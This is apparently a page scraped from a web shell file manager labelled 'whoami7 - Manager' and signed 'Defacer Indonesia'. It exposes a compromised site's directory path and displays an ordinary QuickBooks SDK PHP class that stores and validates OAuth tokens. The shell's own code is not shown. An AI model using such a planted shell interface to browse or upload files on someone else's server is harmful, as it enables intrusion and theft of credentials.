whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
quickbooks
/
v3-php-sdk
/
src
/
Security
/
Upload File:
files >> //home/kckglobal/www/portal/vendor/quickbooks/v3-php-sdk/src/Security/OAuthRequestValidator.php
<?php namespace QuickBooksOnline\API\Security; use QuickBooksOnline\API\Exception\SdkExceptions\InvalidTokenException; /** * OAuth implementation conforming to RequestValidator base class * * OAuth implementation conforming to RequestValidator base class, * to allow IPP calls via often-used OAuth mechanism. * */ class OAuthRequestValidator extends RequestValidator { /** * The Oauth signature method. * @var string */ public $oauthSignatureMethod; /** * The OAuth Access Token * @var string */ public $AccessToken; /** * The OAuth Access Token Secret * @var string */ public $AccessTokenSecret; /** * The OAuth Consumer Key * @var string */ public $ConsumerKey; /** * The OAuth Consumer Secret * @var string */ public $ConsumerSecret; /** * Initializes a new instance of the OAuthRequestValidator class. * * @param int $accessToken The access token. * @param int $accessTokenSecret The access token secret. * @param int $consumerKey The consumer key. * @param int $consumerSecret The consumer secret. */ public function __construct($accessToken, $accessTokenSecret, $consumerKey, $consumerSecret) { if (empty($accessToken)) { throw new InvalidTokenException('Access token cannot be null or empty.'); } if (empty($accessTokenSecret)) { throw new InvalidTokenException("Access token secret cannot be null or empty."); } if (empty($consumerKey)) { throw new InvalidTokenException("Consumer key cannot be null or empty."); } if (empty($consumerSecret)) { throw new InvalidTokenException("Consumer key secret cannot be null or empty."); } $this->AccessToken = $accessToken; $this->AccessTokenSecret = $accessTokenSecret; $this->ConsumerKey = $consumerKey; $this->ConsumerSecret = $consumerSecret; $this->oauthSignatureMethod = 'HMAC-SHA1'; } }
Copyright ©2021 || Defacer Indonesia